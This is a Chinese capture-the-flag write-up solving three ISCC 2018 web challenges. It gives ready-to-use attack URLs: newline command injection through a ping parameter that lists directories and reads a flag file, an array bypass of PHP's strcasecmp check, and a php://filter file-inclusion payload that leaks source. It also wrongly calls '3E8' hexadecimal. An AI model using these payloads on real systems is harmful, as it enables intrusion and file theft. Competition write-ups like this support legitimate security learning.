iscc 2018
1.请ping我的ip 看你能Ping通吗?
我都过滤了,看你怎么绕。题目地址:http://118.190.152.202:8018
思路:命令注入
经测试,?ip=xxx
的确可以做到ping
%0a
截断
linux 命令:
ls /命令看根目录
http://118.190.152.202:8018/index.php?ip=127.0.0.1%0Als%20/
看到如下目录
ls -lR /home查看每个文件夹
http://118.190.152.202:8018/index.php?ip=127.0.0.1%0Als%20-lR%20/home
cat%20/home/flag查看文件
http://118.190.152.202:8018/index.php?ip=127.0.0.1%0Acat%20/home/flag
2.Please give me username and password!
题目地址:http://118.190.152.202:8017/
构造地址:http://118.190.152.202:8017/index.php?username=11&password=111
查看源代码:
<?php error_reporting(0); $flag = "***********"; if(isset($_GET['username'])){ if (0 == strcasecmp($flag,$_GET['username'])){ $a = fla; echo "very good!Username is right"; } else{ print 'Username is not right<!--index.php.txt-->';} }else print 'Please give me username or password!'; if (isset($_GET['password'])){ if (is_numeric($_GET['password'])){ if (strlen($_GET['password']) < 4){ if ($_GET['password'] > 999){ $b = g; print '<p>very good!Password is right</p>'; }else print '<p>Password too little</p>'; }else print '<p>Password too long</p>'; }else print '<p>Password is not numeric</p>'; } if ($a.$b == "flag") print $flag; ?>
1.strcasecmp遇到数组会返回NULL,null=0于是条件成立
2.password虽然只能到999,100便报错,但是可以用16进制3E8来绕
http://118.190.152.202:8017/index.php?username[]=1&password=3E8
3.你能绕过吗?
题目地址: http://118.190.152.202:8008/
文件包含漏洞:
http://118.190.152.202:8008/index.php?f=Php://filter/read=convert.base64-encode/resource=index&id=4
base64解码